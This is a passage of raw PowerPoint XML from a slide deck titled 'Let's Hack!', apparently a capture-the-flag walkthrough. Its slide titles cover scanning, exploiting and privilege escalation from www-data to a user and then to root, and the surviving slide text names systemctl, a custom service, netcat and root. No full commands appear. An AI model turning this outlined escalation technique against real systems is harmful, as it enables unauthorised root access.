        <p:spPr>
          <a:xfrm>
            <a:off x="9586558" y="2331936"/>
            <a:ext cx="1569122" cy="329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Systemctl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>own.service</a:t>
            </a:r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784479-5C0D-124C-9490-D01ED27D645C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10008530" y="2995056"/>
            <a:ext cx="1002669" cy="2511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/>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>root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52AD6BB-D5F2-AA49-B505-4803D5EED625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7873341" y="4126675"/>
            <a:ext cx="1990708" cy="492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start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10667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887</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>109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Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>News Gothic MT</vt:lpstr>
      <vt:lpstr>RetrospectVTI</vt:lpstr>
      <vt:lpstr>Let’s Hack!</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Exploiting</vt:lpstr>
      <vt:lpstr>Privilege Escalation: www-data -&gt; Pepper</vt:lpstr>
      <vt:lpstr>Privilege Escalation: www-data -&gt; Pepper</vt:lpstr>
      <vt:lpstr>Privilege Escalation: Pepper -&gt; Root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Hack!</dc:title>
  <dc:creator>Anthony Pipia</dc:creator>
  <cp:lastModifiedBy>Anthony Pipia</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-23T22:31:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-24T16:37:18Z</dcterms:modified>
</cp:coreProperties>
</file>